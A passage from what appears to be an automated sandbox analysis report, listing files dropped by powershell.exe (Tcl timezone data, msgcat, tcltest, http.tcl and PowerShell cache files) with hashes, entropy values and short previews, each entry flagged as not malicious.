                                                                                                                                                                                                                      SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                      SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):189
                                                                                                                                                                                                                      Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                      MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                      SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                      SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                      SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1080
                                                                                                                                                                                                                      Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                      MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                      SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                      SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                      SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                      MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                      SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                      SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                      SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                      MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                      SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                      SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                      SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                      MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                      SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
                                                                                                                                                                                                                      SHA-256:F6D1BA22115A6565B6D6ABEB578F001DDB41E673C422C8EA70D0DF77B24115F6
                                                                                                                                                                                                                      SHA-512:23DB3E298FDEB165FD85D99E03C00835B584984B814AF7F54A9CDD4A9F93E16B0C58342D319129F46CF8EC36F93DE5EA51B492CA4CABDAB75D84709BC6C26119
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):178
                                                                                                                                                                                                                      Entropy (8bit):4.882974805254803
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcx2m/2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dw/2D4yn
                                                                                                                                                                                                                      MD5:92FF9E5835C0C80F358BFE69120660A0
                                                                                                                                                                                                                      SHA1:724758B43BD79DD8A29B02BE6910D492924F8280
                                                                                                                                                                                                                      SHA-256:5047A507D22B68C9349EB6A48C41C80DB4C69F98F99C6574059DEA87178E36C0
                                                                                                                                                                                                                      SHA-512:6FCB709DB4AC19191FECE1E8BAC55E77F265B5AF89F7A3565F06BFAF0BEE12E3EAF2F52CA09C68D75C358C25A31867505CE8AD75D7386DCD15F4BE1CE61272CD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Bangui) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):184
                                                                                                                                                                                                                      Entropy (8bit):4.888193386512119
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcx79FHp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dw7J4c
                                                                                                                                                                                                                      MD5:46E5703CF284E44E15E5872DF075FCBC
                                                                                                                                                                                                                      SHA1:EA4BFA6D568DFA877F72302ADA21ECC2840D9FD5
                                                                                                                                                                                                                      SHA-256:77E610A02CCECE3045B09D07A9BE6100F5AA9C3C2AEB543535C9AE941194F4E4
                                                                                                                                                                                                                      SHA-512:1454467FE63E97DFA4DE66E359F68B2D80C92CDE59FC15A4BE513629FFD154D2281EADF3FC78F7AFDDF5A5896195F3A69E66697A659BBB1A0EAFD3E1DA6565EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):176
                                                                                                                                                                                                                      Entropy (8bit):4.847843768169462
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QF08x/2Dc5iDMXGm2OHGVkeoHsdSawwF6hSVPVFwy:SlSWB9eg/2D4uDm2OHCkeoH1awwFMmMy
                                                                                                                                                                                                                      MD5:7E710C939B9CC0C1AC1ECF4239B543C5
                                                                                                                                                                                                                      SHA1:429CC87086FB22727815ED05AC6472333FF06013
                                                                                                                                                                                                                      SHA-256:2A870E534DE67713C27F2F3B9BF26FA7498C240CF633988CE76DBDAC5B69214D
                                                                                                                                                                                                                      SHA-512:70D9365C31C43A95211FC20E9290B24D356FFEFA935B8829CE32831026A196DECDD12226097F6DA3B4B919E137AA0181714680CDBB72B00C130A87E3A4735004
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Bissau) {.. {-9223372036854775808 -3740 0 LMT}.. {-1830380400 -3600 0 -01}.. {157770000 0 0 GMT}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):4.904342145830274
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc8ycXp75h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAmp1hs
                                                                                                                                                                                                                      MD5:7AD3749D7047855CB9B9EC9696015402
                                                                                                                                                                                                                      SHA1:F792359AD9EEC2ABD98DAFA6661C1E57BAB89EBE
                                                                                                                                                                                                                      SHA-256:8F700409B8EEE33ACE5F050414971FFEE0270949842E58E9299BB5CD6CCF34DE
                                                                                                                                                                                                                      SHA-512:681C1B318746C587DEBA6E109D1D5A99D1F3E28FE46C24F36B69D533D884FDDC6EA35BB31A475575D683B73BF129FED761523EC9285F2FF1E4CACA2C54C046C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                      Size (bytes):183
                                                                                                                                                                                                                      Entropy (8bit):4.901235831565769
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DciE0TMJZp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D4qGp4D1
                                                                                                                                                                                                                      MD5:7028268EE88250AC40547A3FDBBFC67C
                                                                                                                                                                                                                      SHA1:5006D499CD1D1CB93EB3DA0EC279F76B7123DAA6
                                                                                                                                                                                                                      SHA-256:596DB2D64CDD6250642CB65514D5BCB52F3E3EA83F50D8915D9D4FDEA008F440
                                                                                                                                                                                                                      SHA-512:D623C69FE8A6050E77FB819C2F5FAEE35D5034182B1D30A409C17208155501656133E774E402875537335F8201E4734A0B5D327712CBF623AC330F1014D9025B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11707
                                                                                                                                                                                                                      Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                      MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                      SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                      SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                      SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6218
                                                                                                                                                                                                                      Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                      MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                      SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                      SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                      SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35136
                                                                                                                                                                                                                      Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                      MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                      SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                      SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                      SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):107674
                                                                                                                                                                                                                      Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                      MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                      SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                      SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                      SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):118419
                                                                                                                                                                                                                      Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                      MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                      SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                      SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                      SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9434
                                                                                                                                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
